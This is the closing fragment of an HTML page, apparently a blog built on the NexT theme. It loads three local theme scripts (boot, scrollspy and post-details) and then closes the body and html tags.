<script src="/js/next-boot.js?v=7.3.0"></script>




  




























  

  

  


  
  <script src="/js/scrollspy.js?v=7.3.0"></script>
<script src="/js/post-details.js?v=7.3.0"></script>


</body>
</html>
